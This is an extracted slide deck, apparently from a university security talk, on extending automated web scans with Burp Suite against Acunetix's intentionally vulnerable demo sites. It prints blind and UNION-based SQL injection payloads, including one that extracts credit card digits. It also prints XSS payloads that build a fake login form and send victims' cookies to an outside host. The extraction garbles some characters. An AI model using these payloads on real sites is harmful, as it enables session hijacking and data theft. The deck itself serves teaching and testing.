Embed Size (px)
Citation preview
Adding Value to Automated Web Scans
Burp Suite and Beyond
Automated Scanning vs Manual Tes;ng
• Manual Tes;ng Tools/Suites • At MSU -‐ QualysGuard WAS & Burp Suite • Automated Scanning -‐ iden;fy aCack surface accross organiza;on
• Manual Tes;ng -‐ proxy tools used to verify scan results and find what automated scans miss
• Both necessary in a large enviroment
Automated Scanning vs Manual Tes;ng
Strengths of Automated Scanners: • Scheduling • Repor;ng • Scalability Strengths of Manual Scanners: • Proxy based -‐ allows intercep;on of requests • Customize payloads for vulnerability detec;on • Verify findings from automated scan results.
Automated Scanning vs Manual Tes;ng
Weaknesses of automated scanners: • increased poten;al for false posi;ves • duplicate findings • code coverage not as thourough Weaknesses of manual scanning: • tester needs knowledge of applica;on for best results • learning curve (developers already stretched thin) • not scalable (e.g. distribu;ng reports is very ;me consuming)
Methodology Reconnaissance Spider target Hidden Files Google site search
End result is a comprehensive map of site Discovery Automated Scanning Manual Detec;on and Analysis Exploit Automated Exploit tools -‐ sqlmap, havij, metasploit Burp Suite -‐ hands-‐on tes=ng
5
Road Map
Spider and vulnerability scan already performed Leverage Burp tools to expand upon proof of concepts from scan results Carry out actual aCack scenarios
6
Tools for this Demo
BurpSuite Firefox FoxyProxy addon Firebug addon Target: *.vulnweb.com (inten;onally vulnerable websites from Acune;x)
Scan Results
§ Vulnerabilty reports -‐ proof of concept (POC) include request payload and applica;on response
§ POCs are not intui;ve, o\en met with doubt
§ Need to be able to drive home the real risk
Scan Report -‐ XSS example
Scan Report -‐ SQLi Example
SQL Injec;on Boolean Based SQLi (Blind SQL Injec;on) Blind SQLi is possible if applica;on will respond to true and false condi;ons in a detectable manner* hCp://testphp.vulnweb.com/listproducts.php?ar;st=1 and 1=1 //true condi;on hCp://testphp.vulnweb.com/listproducts.php?ar;st=1 and 1=2 //false condi;on `
*Differences between true and false responses could be subtle. The comparer tool highlights the differences between two responses Error Based SQLi Possible if applica;on echos database errors to browser. Errors to reveal informa;on about database that serve as clues for building an aCack.
11
Demo -‐ SQLi
A BeBer Blind SQLi Proof of Concept hCp://testphp.vulnweb.com/listproducts.php?ar;st=1 and substring(@@version,1,1)=4 and 1=1 // false hCp://testphp.vulnweb.com/listproducts.php?ar;st=1 and substring(@@version,1,1)=5 and 1=1 //true
SQLi Exploit Example
A BeBer Error Based SQLi POC testphp.vulnweb.com/listproducts.php?ar=st=1' -‐ error vulnweb.com/listproducts.php?ar=st=1 union all select 1,2,3,4,5,6,7,8,9,10 -‐ error vulnweb.com/listproducts.php?ar=st=1 union all select 1,2,3,4,5,6,7,8,9,10,11 -‐ no error! vulnweb.com/listproducts.php?ar=st=1 union all select 1,2,3,4,5,6,7,8,9,10,11 from users -‐ no error!
Cross Site Scrip;ng
XSS type 0 -‐ DOM Based – aCack string embedded in URL and not processed by the server. Executed in the DOM client-‐side (very much like reflected) XSS type 1 – Reflected – aCack string is submiCed with request (usually in URL) and the server embeds the string in the HTML of the response *DOM based and reflected depend on social engineering to succeed XSS type 2 -‐ Persistent (stored) XSS – the applica;on stores the aCack string so that it is presented in future responses
14
Reflected XSS Demo
Target: hCp://testasp.vulnweb.com/Search.asp ?mSearch= Goal: modify page to look like login Payload: /Search.asp?mSearch= <script>document.getElementsByClassName('FramedForm').item(0).innerHTML = "password <div ><input type='password' id='pw' /><input type='buCon' onclick='alert(pw.value)' value='login' /></div>"; document.getElementsByClassName('path').item(0).innerHTML = '';</script> *Requires social engineering. Obfuscate the query string to hide script
Same Origin Policy Same Origin Policy -‐ SOP allows you to make requests to pages within the same site/domain, while preven;ng you from making requests to pages on a different domain. Without SOP the internet would be very unsafe. Visit my evil site and I can direct your browser to aCack any site I want. Goal of XSS aCack is to subvert SOP to exfiltrate informa;on
Bypassing SOP
Image source You are allowed to include images with source outside of the applica;on's domain <img src=’evildomain.com? id=’ /> the src is an HTTP GET request Example XSS <div onmouseover=”xssScript()” ><img id='evil' src='evildomain.com?id=' size='1px' /></div> <script> func;on xssScript( ){ ………..}</script></div>
17
Persistent XSS Demo Target: hCp://testphp.vulnweb.com/guestbook.php Goal: Inject javascript and image to bypass SOP Objec=ve is to send cookie to my evil site: www.montana.edu/hardin/cookiejar.php?d={cookie}
Persistent XSS Demo
Payload: Hello<div onmouseover=addsource() style=’width:100%’> <img size='1px' id='badimg' /></div> there <script> func;on addsource(){ document.getElementById("badimg").src = "hCp://www.montana.edu/hardin/cookiejar.php?d="+document.cookie; } </script>
SOP has been subverted!!!
SQLi Exploit Example Goal: Use Intruder to brute force the value of the credit card field 1. Set proxy to intercept
2. Submit request in browser hCp://testphp.vulnweb.com/ar;sts.php?ar;st=1 and (select substring(cc,1,1)= 1 from users limit 0,1)=1
3. Send intercepted request to Intruder tool 4. Indicate posi=on(s) to be injected hCp://testphp.vulnweb.com/ar;sts.php?ar;st=1 and (select substring(cc,1,1)= 1 from users limit 0,1)=1
5. Define the payloads 6. Start ABack
